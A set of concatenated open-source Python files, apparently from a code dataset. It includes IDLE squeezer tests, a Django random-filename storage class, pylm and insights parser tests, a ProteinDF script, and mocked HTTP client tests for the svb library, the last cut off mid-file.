text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = editwin.per.bottom = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.count_lines = Mock(return_value=6)
# prepare some text in the Text widget
text_widget.insert("1.0", "SOME\nTEXT\n", tag_name)
text_widget.mark_set("insert", "1.0")
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
# test squeezing the current text
retval = squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(retval, "break")
self.assertEqual(text_widget.get('1.0', 'end'), '\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 1)
self.assertEqual(squeezer.expandingbuttons[0].s, 'SOME\nTEXT')
# test that expanding the squeezed text works and afterwards the
# Text widget contains the original text
squeezer.expandingbuttons[0].expand(event=Mock())
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_squeeze_current_text_event_no_allowed_tags(self):
"""Test that the event doesn't squeeze text without a relevant tag."""
root = get_test_tk_root(self)
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = editwin.per.bottom = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.count_lines = Mock(return_value=6)
# prepare some text in the Text widget
text_widget.insert("1.0", "SOME\nTEXT\n", "TAG")
text_widget.mark_set("insert", "1.0")
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
# test squeezing the current text
retval = squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(retval, "break")
self.assertEqual(text_widget.get('1.0', 'end'), 'SOME\nTEXT\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_squeeze_text_before_existing_squeezed_text(self):
"""Test squeezing text before existing squeezed text."""
root = get_test_tk_root(self)
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = editwin.per.bottom = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.count_lines = Mock(return_value=6)
# prepare some text in the Text widget and squeeze it
text_widget.insert("1.0", "SOME\nTEXT\n", "stdout")
text_widget.mark_set("insert", "1.0")
squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(len(squeezer.expandingbuttons), 1)
# test squeezing the current text
text_widget.insert("1.0", "MORE\nSTUFF\n", "stdout")
text_widget.mark_set("insert", "1.0")
retval = squeezer.squeeze_current_text_event(event=Mock())
self.assertEqual(retval, "break")
self.assertEqual(text_widget.get('1.0', 'end'), '\n\n\n')
self.assertEqual(len(squeezer.expandingbuttons), 2)
self.assertTrue(text_widget.compare(
squeezer.expandingbuttons[0],
'<',
squeezer.expandingbuttons[1],
))
GetOptionSignature = namedtuple('GetOptionSignature',
'configType section option default type warn_on_default raw')
@classmethod
def _make_sig(cls, configType, section, option, default=sentinel.NOT_GIVEN,
type=sentinel.NOT_GIVEN,
warn_on_default=sentinel.NOT_GIVEN,
raw=sentinel.NOT_GIVEN):
return cls.GetOptionSignature(configType, section, option, default,
type, warn_on_default, raw)
@classmethod
def get_GetOption_signature(cls, mock_call_obj):
args, kwargs = mock_call_obj[-2:]
return cls._make_sig(*args, **kwargs)
def test_reload(self):
"""Test the reload() class-method."""
self.assertIsInstance(Squeezer.auto_squeeze_min_lines, int)
idleConf.SetOption('main', 'PyShell', 'auto-squeeze-min-lines', '42')
Squeezer.reload()
self.assertEqual(Squeezer.auto_squeeze_min_lines, 42)
class ExpandingButtonTest(unittest.TestCase):
"""Tests for the ExpandingButton class."""
# In these tests the squeezer instance is a mock, but actual tkinter
# Text and Button instances are created.
def make_mock_squeezer(self):
"""Helper for tests: Create a mock Squeezer object."""
root = get_test_tk_root(self)
squeezer = Mock()
squeezer.editwin.text = Text(root)
# Set default values for the configuration settings
squeezer.auto_squeeze_min_lines = 50
return squeezer
@patch('idlelib.squeezer.Hovertip', autospec=Hovertip)
def test_init(self, MockHovertip):
"""Test the simplest creation of an ExpandingButton."""
squeezer = self.make_mock_squeezer()
text_widget = squeezer.editwin.text
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
self.assertEqual(expandingbutton.s, 'TEXT')
# check that the underlying tkinter.Button is properly configured
self.assertEqual(expandingbutton.master, text_widget)
self.assertTrue('50 lines' in expandingbutton.cget('text'))
# check that the text widget still contains no text
self.assertEqual(text_widget.get('1.0', 'end'), '\n')
# check that the mouse events are bound
self.assertIn('<Double-Button-1>', expandingbutton.bind())
right_button_code = '<Button-%s>' % ('2' if macosx.isAquaTk() else '3')
self.assertIn(right_button_code, expandingbutton.bind())
# check that ToolTip was called once, with appropriate values
self.assertEqual(MockHovertip.call_count, 1)
MockHovertip.assert_called_with(expandingbutton, ANY, hover_delay=ANY)
# check that 'right-click' appears in the tooltip text
tooltip_text = MockHovertip.call_args[0][1]
self.assertIn('right-click', tooltip_text.lower())
def test_expand(self):
"""Test the expand event."""
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
# insert the button into the text widget
# (this is normally done by the Squeezer class)
text_widget = expandingbutton.text
text_widget.window_create("1.0", window=expandingbutton)
# set base_text to the text widget, so that changes are actually made
# to it (by ExpandingButton) and we can inspect these changes afterwards
expandingbutton.base_text = expandingbutton.text
# trigger the expand event
retval = expandingbutton.expand(event=Mock())
self.assertEqual(retval, None)
# check that the text was inserted into the text widget
self.assertEqual(text_widget.get('1.0', 'end'), 'TEXT\n')
# check that the 'TAGS' tag was set on the inserted text
text_end_index = text_widget.index('end-1c')
self.assertEqual(text_widget.get('1.0', text_end_index), 'TEXT')
self.assertEqual(text_widget.tag_nextrange('TAGS', '1.0'),
('1.0', text_end_index))
# check that the button removed itself from squeezer.expandingbuttons
self.assertEqual(squeezer.expandingbuttons.remove.call_count, 1)
squeezer.expandingbuttons.remove.assert_called_with(expandingbutton)
def test_expand_dangerous_oupput(self):
"""Test that expanding very long output asks user for confirmation."""
squeezer = self.make_mock_squeezer()
text = 'a' * 10**5
expandingbutton = ExpandingButton(text, 'TAGS', 50, squeezer)
expandingbutton.set_is_dangerous()
self.assertTrue(expandingbutton.is_dangerous)
# insert the button into the text widget
# (this is normally done by the Squeezer class)
text_widget = expandingbutton.text
text_widget.window_create("1.0", window=expandingbutton)
# set base_text to the text widget, so that changes are actually made
# to it (by ExpandingButton) and we can inspect these changes afterwards
expandingbutton.base_text = expandingbutton.text
# patch the message box module to always return False
with patch('idlelib.squeezer.tkMessageBox') as mock_msgbox:
mock_msgbox.askokcancel.return_value = False
mock_msgbox.askyesno.return_value = False
# trigger the expand event
retval = expandingbutton.expand(event=Mock())
# check that the event chain was broken and no text was inserted
self.assertEqual(retval, 'break')
self.assertEqual(expandingbutton.text.get('1.0', 'end-1c'), '')
# patch the message box module to always return True
with patch('idlelib.squeezer.tkMessageBox') as mock_msgbox:
mock_msgbox.askokcancel.return_value = True
mock_msgbox.askyesno.return_value = True
# trigger the expand event
retval = expandingbutton.expand(event=Mock())
# check that the event chain wasn't broken and the text was inserted
self.assertEqual(retval, None)
self.assertEqual(expandingbutton.text.get('1.0', 'end-1c'), text)
def test_copy(self):
"""Test the copy event."""
# testing with the actual clipboard proved problematic, so this test
# replaces the clipboard manipulation functions with mocks and checks
# that they are called appropriately
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
expandingbutton.clipboard_clear = Mock()
expandingbutton.clipboard_append = Mock()
# trigger the copy event
retval = expandingbutton.copy(event=Mock())
self.assertEqual(retval, None)
# check that the expanding button called clipboard_clear() and
# clipboard_append('TEXT') once each
self.assertEqual(expandingbutton.clipboard_clear.call_count, 1)
self.assertEqual(expandingbutton.clipboard_append.call_count, 1)
expandingbutton.clipboard_append.assert_called_with('TEXT')
def test_view(self):
"""Test the view event."""
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
expandingbutton.selection_own = Mock()
with patch('idlelib.squeezer.view_text', autospec=view_text)\
as mock_view_text:
# trigger the view event
expandingbutton.view(event=Mock())
# check that the expanding button called view_text
self.assertEqual(mock_view_text.call_count, 1)
# check that the proper text was passed
self.assertEqual(mock_view_text.call_args[0][2], 'TEXT')
def test_rmenu(self):
"""Test the context menu."""
squeezer = self.make_mock_squeezer()
expandingbutton = ExpandingButton('TEXT', 'TAGS', 50, squeezer)
with patch('tkinter.Menu') as mock_Menu:
mock_menu = Mock()
mock_Menu.return_value = mock_menu
mock_event = Mock()
mock_event.x = 10
mock_event.y = 10
expandingbutton.context_menu_event(event=mock_event)
self.assertEqual(mock_menu.add_command.call_count,
len(expandingbutton.rmenu_specs))
for label, *data in expandingbutton.rmenu_specs:
mock_menu.add_command.assert_any_call(label=label, command=ANY)
if __name__ == '__main__':
unittest.main(verbosity=2)
| gpl-2.0 | 148,277,836,799,124,160 | 41.948919 | 80 | 0.631032 | false |
everlof/RestKit-n-Django-Sample | Project_Django/cite/storage.py | 1 | 6739 | # This file has been shamelessly copied (MIT licence) from
# https://bitbucket.org/akoha/django-randomfilenamestorage
# Conversion to Python 3 by Alexander Nilsson
from errno import EEXIST
import ntpath
import os
import posixpath
import random
import string
from warnings import warn
from django.conf import settings
from django.core.files.storage import (Storage, FileSystemStorage,
locks, file_move_safe)
CHARACTERS = string.ascii_lowercase + string.digits
DEFAULT_LENGTH = 16
def random_string(length):
return ''.join(random.choice(CHARACTERS) for i in range(length))
def RandomFilenameMetaStorage(storage_class, length=None, uniquify_names=True):
class RandomFilenameStorage(storage_class):
def __init__(self, *args, **kwargs):
self.randomfilename_length = kwargs.pop('randomfilename_length',
length)
if self.randomfilename_length is None:
self.randomfilename_length = getattr(settings,
'RANDOM_FILENAME_LENGTH',
DEFAULT_LENGTH)
# Do not uniquify filenames by default.
self.randomfilename_uniquify_names = kwargs.pop('uniquify_names',
uniquify_names)
# But still try to tell storage_class not to uniquify filenames.
# This class will be the one that uniquifies.
try:
new_kwargs = dict(kwargs, uniquify_names=False)
super(RandomFilenameStorage, self).__init__(*args,
**new_kwargs)
except TypeError:
super(RandomFilenameStorage, self).__init__(*args, **kwargs)
def get_available_name(self, name, retry=True):
# All directories have forward slashes, even on Windows
name = name.replace(ntpath.sep, posixpath.sep)
dir_name, file_name = posixpath.split(name)
file_root, file_ext = posixpath.splitext(file_name)
# If retry is True and the filename already exists, keep
# on generating random filenames until the generated
# filename doesn't exist.
while True:
file_prefix = random_string(self.randomfilename_length)
# file_ext includes the dot.
name = posixpath.join(dir_name, file_prefix + file_ext)
if not retry or not self.exists(name):
return name
def _save(self, name, *args, **kwargs):
while True:
try:
return super(RandomFilenameStorage, self)._save(name,
*args,
**kwargs)
except OSError as e:
if e.errno == EEXIST:
# We have a safe storage layer
if not self.randomfilename_uniquify_names:
# A higher storage layer will rename
raise
# Attempt to get_available_name() without retrying.
try:
name = self.get_available_name(name,
retry=False)
except TypeError:
warn('Could not call get_available_name() '
'on %r with retry=False' % self)
name = self.get_available_name(name)
else:
raise
RandomFilenameStorage.__name__ = 'RandomFilename' + storage_class.__name__
return RandomFilenameStorage
class SafeFileSystemStorage(FileSystemStorage):
"""
Standard filesystem storage
Supports *uniquify_names*, like other safe storage classes.
Based on django.core.files.storage.FileSystemStorage.
"""
def __init__(self, *args, **kwargs):
self.uniquify_names = kwargs.pop('uniquify_names', True)
super(SafeFileSystemStorage, self).__init__(*args, **kwargs)
def _save(self, name, content):
full_path = self.path(name)
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
os.makedirs(directory)
elif not os.path.isdir(directory):
raise IOError("%s exists and is not a directory." % directory)
# There's a potential race condition between get_available_name and
# saving the file; it's possible that two threads might return the
# same name, at which point all sorts of fun happens. So we need to
# try to create the file, but if it already exists we have to go back
# to get_available_name() and try again.
while True:
try:
# This file has a file path that we can move.
if hasattr(content, 'temporary_file_path'):
file_move_safe(content.temporary_file_path(), full_path)
content.close()
# This is a normal uploadedfile that we can stream.
else:
# This fun binary flag incantation makes os.open throw an
# OSError if the file already exists before we open it.
fd = os.open(full_path,
(os.O_WRONLY | os.O_CREAT | os.O_EXCL |
getattr(os, 'O_BINARY', 0)))
try:
locks.lock(fd, locks.LOCK_EX)
for chunk in content.chunks():
os.write(fd, chunk)
finally:
locks.unlock(fd)
os.close(fd)
except OSError as e:
if e.errno == EEXIST:
# Ooops, the file exists. We need a new file name.
if not self.uniquify_names:
raise
name = self.get_available_name(name)
full_path = self.path(name)
else:
raise
else:
# OK, the file save worked. Break out of the loop.
break
if settings.FILE_UPLOAD_PERMISSIONS is not None:
os.chmod(full_path, settings.FILE_UPLOAD_PERMISSIONS)
return name
RandomFilenameFileSystemStorage = RandomFilenameMetaStorage(
storage_class=SafeFileSystemStorage,
)
| mit | -733,618,468,414,824,200 | 42.477419 | 79 | 0.520255 | false |
openturns/otdistfunc | python/test/t_distributed_python_wrapper_std.py | 1 | 1727 | #! /usr/bin/env python
# -*- coding: utf8 -*-
import sys
import os
# space separated list of hosts
#remote_hosts = "localhost node-1:2 node-3:4"
remote_hosts = "localhost"
test_dir = os.path.dirname(os.path.realpath(__file__))
start_script = sys.executable + " " + test_dir + os.sep + \
"t_distributed_python_wrapper.py"
test_type = "local"
if len(sys.argv) >= 3:
test_type = sys.argv[2]
if test_type == "local":
default_param = " --test local "
elif test_type == "remote":
default_param = " --test remote --hosts " + remote_hosts + " "
else:
print ('Wrong arguments!')
exit(1)
os.system(start_script + default_param + " --point ")
os.system(start_script + default_param + " --analytical ")
os.system(start_script + default_param + " --point --analytical ")
os.system(start_script + default_param +
"--sample-size 50 --work-time 0.1 ")
os.system(start_script + default_param +
"--sample-size 10 --nb-output 1000 ")
os.system(start_script + default_param +
"--sample-size 1 ")
os.system(start_script + default_param +
"--sample-size 5 --work-time 0.1 --cleanup no ")
os.system(start_script + default_param +
"--sample-size 1 --cleanup no ")
os.system(start_script + default_param +
"--sample-size 5 --work-time 0.1 --cleanup all ")
os.system(start_script + default_param +
"--sample-size 1 --cleanup all ")
os.system(start_script + default_param +
" --sample-size 10 --work-time 0.1 --error ")
os.system(start_script + default_param +
" --sample-size 4 --work-time 0.1 --error --cleanup no")
os.system(start_script + default_param +
" --sample-size 4 --work-time 0.1 --error --cleanup all")
| lgpl-3.0 | -7,919,461,645,429,032,000 | 29.839286 | 67 | 0.62073 | false |
nfqsolutions/pylm | tests/test_services/test_subscribed_client.py | 1 | 2736 | import concurrent.futures
import time
from concurrent.futures import ThreadPoolExecutor
import zmq
from pylm.clients import Client
from pylm.parts.core import zmq_context
from pylm.parts.messages_pb2 import PalmMessage
def fake_server(messages=1):
db_socket = zmq_context.socket(zmq.REP)
db_socket.bind('inproc://db')
pull_socket = zmq_context.socket(zmq.PULL)
pull_socket.bind('inproc://pull')
pub_socket = zmq_context.socket(zmq.PUB)
pub_socket.bind('inproc://pub')
# PUB-SUB takes a while
time.sleep(1.0)
for i in range(messages):
message_data = pull_socket.recv()
print(i)
message = PalmMessage()
message.ParseFromString(message_data)
topic = message.client
pub_socket.send_multipart([topic.encode('utf-8'), message_data])
def test_subscribed_client_single():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
push_address='inproc://pull',
sub_address='inproc://pub',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=2),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 2
def test_subscribed_client_multiple():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
client1 = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=4),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2),
executor.submit(client1.job, 'f', [b'a', b'b'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 4
if __name__ == '__main__':
test_subscribed_client_single()
test_subscribed_client_multiple()
| agpl-3.0 | -7,718,448,006,989,908,000 | 25.823529 | 72 | 0.56981 | false |
ProteinDF/ProteinDF_pytools | scripts/pdf-mat-show.py | 1 | 1495 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import proteindf_tools as pdf
import logging
logger = logging.getLogger(__name__)
def main():
# parse args
parser = argparse.ArgumentParser(description='show matrix contents')
parser.add_argument("path",
nargs=1,
help='matrix path')
parser.add_argument("-v", "--verbose",
action="store_true",
default=False)
parser.add_argument('-D', '--debug',
action='store_true',
default=False)
args = parser.parse_args()
# setting
mat_path = args.path[0]
verbose = args.verbose
if args.debug:
logging.basicConfig(level=logging.DEBUG)
if verbose:
print("loading: {}".format(mat_path))
stdmat = pdf.Matrix()
symmat = pdf.SymmetricMatrix()
if stdmat.is_loadable(mat_path):
stdmat.load(mat_path)
print("standard dens matrix")
print("size: {row} x {col}".format(row = stdmat.rows,
col = stdmat.cols))
print(stdmat)
elif symmat.is_loadable(mat_path):
symmat.load(mat_path)
print("symmetric dens matrix")
print("size: {row} x {col}".format(row = symmat.rows,
col = symmat.cols))
print(symmat)
else:
print("cannot load file.")
if __name__ == '__main__':
main()
| gpl-3.0 | -6,754,932,941,244,148,000 | 28.313725 | 72 | 0.525753 | false |
RedHatInsights/insights-core | insights/parsers/tests/test_pmrep.py | 1 | 3328 | import pytest
import doctest
from insights.tests import context_wrap
from insights.parsers import SkipException
from insights.parsers import pmrep
from insights.parsers.pmrep import PMREPMetrics
PMREPMETRIC_DATA = """
Time,"network.interface.out.packets-lo","network.interface.out.packets-eth0","network.interface.collisions-lo","network.interface.collisions-eth0","swap.pagesout","mssql.memory_manager.stolen_server_memory","mssql.memory_manager.total_server_memory"
2021-04-26 05:42:24,,,,,
2021-04-26 05:42:25,1.000,2.000,3.000,4.000,5.000,349816,442000
""".strip()
PMREPMETRIC_DATA_2 = """
Time,"network.interface.out.packets-lo","network.interface.collisions-lo","swap.pagesout"
2021-04-26 05:42:24,,,
2021-04-26 05:42:25,1.000,2.000,3.000
""".strip()
PMREPMETRIC_WRONG_DATA = """
Time,"network.interface.out.packets-lo","network.interface.collisions-lo","swap.pagesout"
""".strip()
PMREPMETRIC_EMPTY_DATA = """
""".strip()
def test_pmrep_info():
pmrep_table = PMREPMetrics(context_wrap(PMREPMETRIC_DATA))
pmrep_table = sorted(pmrep_table, key=lambda x: x['name'])
assert pmrep_table[0] == {'name': 'Time', 'value': '2021-04-26 05:42:25'}
assert pmrep_table[1] == {'name': 'mssql.memory_manager.stolen_server_memory', 'value': '349816'}
assert pmrep_table[2] == {'name': 'mssql.memory_manager.total_server_memory', 'value': '442000'}
assert pmrep_table[3] == {'name': 'network.interface.collisions-eth0', 'value': '4.000'}
assert pmrep_table[4] == {'name': 'network.interface.collisions-lo', 'value': '3.000'}
assert pmrep_table[5] == {'name': 'network.interface.out.packets-eth0', 'value': '2.000'}
assert pmrep_table[6] == {'name': 'network.interface.out.packets-lo', 'value': '1.000'}
assert pmrep_table[7] == {'name': 'swap.pagesout', 'value': '5.000'}
pmrep_table = PMREPMetrics(context_wrap(PMREPMETRIC_DATA_2))
pmrep_table = sorted(pmrep_table, key=lambda x: x['name'])
assert pmrep_table[0] == {'name': 'Time', 'value': '2021-04-26 05:42:25'}
assert pmrep_table[1] == {'name': 'network.interface.collisions-lo', 'value': '2.000'}
assert pmrep_table[2] == {'name': 'network.interface.out.packets-lo', 'value': '1.000'}
assert pmrep_table[3] == {'name': 'swap.pagesout', 'value': '3.000'}
pmrep_table = PMREPMetrics(context_wrap(PMREPMETRIC_DATA))
assert sorted(pmrep_table.search(name__endswith='lo'), key=lambda x: x['name']) == [{'name': 'network.interface.collisions-lo', 'value': '3.000'}, {'name': 'network.interface.out.packets-lo', 'value': '1.000'}]
assert sorted(pmrep_table.search(name__endswith='swap.pagesout'), key=lambda x: x['name']) == [{'name': 'swap.pagesout', 'value': '5.000'}]
def test_empty():
with pytest.raises(SkipException) as e:
PMREPMetrics(context_wrap(PMREPMETRIC_EMPTY_DATA))
assert 'There is no data in the table' in str(e)
def test_wrong_data():
with pytest.raises(SkipException) as e:
PMREPMetrics(context_wrap(PMREPMETRIC_WRONG_DATA))
assert 'There is no data in the table' in str(e)
def test_pmrep_doc_examples():
env = {
'pmrep_doc_obj': PMREPMetrics(context_wrap(PMREPMETRIC_DATA)),
'pmrep_doc_obj_search': PMREPMetrics(context_wrap(PMREPMETRIC_DATA))
}
failed, total = doctest.testmod(pmrep, globs=env)
assert failed == 0
| apache-2.0 | -1,343,600,960,827,136,000 | 45.873239 | 249 | 0.681791 | false |
fuziontech/svb | svb/test/test_http_client.py | 1 | 13560 | import sys
import unittest2
from mock import MagicMock, Mock, patch
import svb
from svb.test.helper import SvbUnitTestCase
VALID_API_METHODS = ('get', 'post', 'delete')
class HttpClientTests(SvbUnitTestCase):
def setUp(self):
super(HttpClientTests, self).setUp()
self.original_filters = svb.http_client.warnings.filters[:]
svb.http_client.warnings.simplefilter('ignore')
def tearDown(self):
svb.http_client.warnings.filters = self.original_filters
super(HttpClientTests, self).tearDown()
def check_default(self, none_libs, expected):
for lib in none_libs:
setattr(svb.http_client, lib, None)
inst = svb.http_client.new_default_http_client()
self.assertTrue(isinstance(inst, expected))
def test_new_default_http_client_urlfetch(self):
self.check_default((),
svb.http_client.UrlFetchClient)
def test_new_default_http_client_requests(self):
self.check_default(('urlfetch',),
svb.http_client.RequestsClient)
def test_new_default_http_client_pycurl(self):
self.check_default(('urlfetch', 'requests',),
svb.http_client.PycurlClient)
def test_new_default_http_client_urllib2(self):
self.check_default(('urlfetch', 'requests', 'pycurl'),
svb.http_client.Urllib2Client)
class ClientTestBase():
@property
def request_mock(self):
return self.request_mocks[self.request_client.name]
@property
def valid_url(self, path='/foo'):
return 'https://api.svb.com%s' % (path,)
def make_request(self, method, url, headers, post_data):
client = self.request_client(verify_ssl_certs=True)
return client.request(method, url, headers, post_data)
def mock_response(self, body, code):
raise NotImplementedError(
'You must implement this in your test subclass')
def mock_error(self, error):
raise NotImplementedError(
'You must implement this in your test subclass')
def check_call(self, meth, abs_url, headers, params):
raise NotImplementedError(
'You must implement this in your test subclass')
def test_request(self):
self.mock_response(self.request_mock, '{"foo": "baz"}', 200)
for meth in VALID_API_METHODS:
abs_url = self.valid_url
data = ''
if meth != 'post':
abs_url = '%s?%s' % (abs_url, data)
data = None
headers = {'my-header': 'header val'}
body, code, _ = self.make_request(
meth, abs_url, headers, data)
self.assertEqual(200, code)
self.assertEqual('{"foo": "baz"}', body)
self.check_call(self.request_mock, meth, abs_url,
data, headers)
def test_exception(self):
self.mock_error(self.request_mock)
self.assertRaises(svb.error.APIConnectionError,
self.make_request,
'get', self.valid_url, {}, None)
class RequestsVerify(object):
def __eq__(self, other):
return other and other.endswith('svb/data/ca-certificates.crt')
class RequestsClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.RequestsClient
def setUp(self):
super(RequestsClientTests, self).setUp()
self.session = MagicMock()
def test_timeout(self):
headers = {'my-header': 'header val'}
data = ''
self.mock_response(self.request_mock, '{"foo": "baz"}', 200)
self.make_request('POST', self.valid_url,
headers, data, timeout=5)
self.check_call(None, 'POST', self.valid_url,
data, headers, timeout=5)
def make_request(self, method, url, headers, post_data, timeout=80):
client = self.request_client(verify_ssl_certs=True,
timeout=timeout,
proxy='http://slap/')
return client.request(method, url, headers, post_data)
def mock_response(self, mock, body, code):
result = Mock()
result.content = body
result.status_code = code
self.session.request = MagicMock(return_value=result)
mock.Session = MagicMock(return_value=self.session)
def mock_error(self, mock):
mock.exceptions.RequestException = Exception
self.session.request.side_effect = mock.exceptions.RequestException()
mock.Session = MagicMock(return_value=self.session)
# Note that unlike other modules, we don't use the "mock" argument here
# because we need to run the request call against the internal mock
# session.
def check_call(self, mock, meth, url, post_data, headers, timeout=80):
self.session.request. \
assert_called_with(meth, url,
headers=headers,
data=post_data,
verify=RequestsVerify(),
proxies={"http": "http://slap/",
"https": "http://slap/"},
timeout=timeout)
class UrlFetchClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.UrlFetchClient
def mock_response(self, mock, body, code):
result = Mock()
result.content = body
result.status_code = code
mock.fetch = Mock(return_value=result)
def mock_error(self, mock):
mock.Error = mock.InvalidURLError = Exception
mock.fetch.side_effect = mock.InvalidURLError()
def check_call(self, mock, meth, url, post_data, headers):
mock.fetch.assert_called_with(
url=url,
method=meth,
headers=headers,
validate_certificate=True,
deadline=55,
payload=post_data
)
class Urllib2ClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.Urllib2Client
def make_request(self, method, url, headers, post_data, proxy=None):
self.client = self.request_client(verify_ssl_certs=True,
proxy=proxy)
self.proxy = proxy
return self.client.request(method, url, headers, post_data)
def mock_response(self, mock, body, code):
response = Mock
response.read = Mock(return_value=body)
response.code = code
response.info = Mock(return_value={})
self.request_object = Mock()
mock.Request = Mock(return_value=self.request_object)
mock.urlopen = Mock(return_value=response)
opener = Mock
opener.open = Mock(return_value=response)
mock.build_opener = Mock(return_value=opener)
mock.build_opener.open = opener.open
mock.ProxyHandler = Mock(return_value=opener)
mock.urlopen = Mock(return_value=response)
def mock_error(self, mock):
mock.urlopen.side_effect = ValueError
mock.build_opener().open.side_effect = ValueError
mock.build_opener.reset_mock()
def check_call(self, mock, meth, url, post_data, headers):
if sys.version_info >= (3, 0) and isinstance(post_data, basestring):
post_data = post_data.encode('utf-8')
mock.Request.assert_called_with(url, post_data, headers)
if (self.client._proxy):
self.assertTrue(type(self.client._proxy) is dict)
mock.ProxyHandler.assert_called_with(self.client._proxy)
mock.build_opener.open.assert_called_with(self.request_object)
self.assertTrue(not mock.urlopen.called)
if (not self.client._proxy):
mock.urlopen.assert_called_with(self.request_object)
self.assertTrue(not mock.build_opener.called)
self.assertTrue(not mock.build_opener.open.called)
class Urllib2ClientHttpsProxyTests(Urllib2ClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(Urllib2ClientHttpsProxyTests, self).make_request(
method, url, headers, post_data,
{"http": "http://slap/",
"https": "http://slap/"})
class Urllib2ClientHttpProxyTests(Urllib2ClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(Urllib2ClientHttpProxyTests, self).make_request(
method, url, headers, post_data,
"http://slap/")
class PycurlClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.PycurlClient
def make_request(self, method, url, headers, post_data, proxy=None):
self.client = self.request_client(verify_ssl_certs=True,
proxy=proxy)
self.proxy = proxy
return self.client.request(method, url, headers, post_data)
@property
def request_mock(self):
if not hasattr(self, 'curl_mock'):
lib_mock = self.request_mocks[self.request_client.name]
self.curl_mock = Mock()
lib_mock.Curl = Mock(return_value=self.curl_mock)
return self.curl_mock
def setUp(self):
super(PycurlClientTests, self).setUp()
self.bio_patcher = patch('svb.util.io.BytesIO')
bio_mock = Mock()
self.bio_patcher.start().return_value = bio_mock
self.bio_getvalue = bio_mock.getvalue
def tearDown(self):
super(PycurlClientTests, self).tearDown()
self.bio_patcher.stop()
def mock_response(self, mock, body, code):
self.bio_getvalue.return_value = body.encode('utf-8')
mock.getinfo.return_value = code
def mock_error(self, mock):
class FakeException(BaseException):
@property
def args(self):
return ('foo', 'bar')
svb.http_client.pycurl.error = FakeException
mock.perform.side_effect = svb.http_client.pycurl.error
def check_call(self, mock, meth, url, post_data, headers):
lib_mock = self.request_mocks[self.request_client.name]
# A note on methodology here: we don't necessarily need to verify
# _every_ call to setopt, but check a few of them to make sure the
# right thing is happening. Keep an eye specifically on conditional
# statements where things are more likely to go wrong.
self.curl_mock.setopt.assert_any_call(lib_mock.NOSIGNAL, 1)
self.curl_mock.setopt.assert_any_call(lib_mock.URL,
svb.util.utf8(url))
if meth == 'get':
self.curl_mock.setopt.assert_any_call(lib_mock.HTTPGET, 1)
elif meth == 'post':
self.curl_mock.setopt.assert_any_call(lib_mock.POST, 1)
else:
self.curl_mock.setopt.assert_any_call(lib_mock.CUSTOMREQUEST,
meth.upper())
self.curl_mock.perform.assert_any_call()
class PycurlClientHttpProxyTests(PycurlClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(PycurlClientHttpProxyTests, self).make_request(
method, url, headers, post_data,
"http://user:withPwd@slap:8888/")
def check_call(self, mock, meth, url, post_data, headers):
lib_mock = self.request_mocks[self.request_client.name]
self.curl_mock.setopt.assert_any_call(lib_mock.PROXY, "slap")
self.curl_mock.setopt.assert_any_call(lib_mock.PROXYPORT, 8888)
self.curl_mock.setopt.assert_any_call(lib_mock.PROXYUSERPWD,
"user:withPwd")
super(PycurlClientHttpProxyTests, self).check_call(
mock, meth, url, post_data, headers)
class PycurlClientHttpsProxyTests(PycurlClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(PycurlClientHttpsProxyTests, self).make_request(
method, url, headers, post_data,
{"http": "http://slap:8888/",
"https": "http://slap2:444/"})
def check_call(self, mock, meth, url, post_data, headers):
lib_mock = self.request_mocks[self.request_client.name]
self.curl_mock.setopt.assert_any_call(lib_mock.PROXY, "slap2")
self.curl_mock.setopt.assert_any_call(lib_mock.PROXYPORT, 444)
super(PycurlClientHttpsProxyTests, self).check_call(
mock, meth, url, post_data, headers)
class APIEncodeTest(SvbUnitTestCase):
def test_encode_dict(self):
body = {
'foo': {
'dob': {
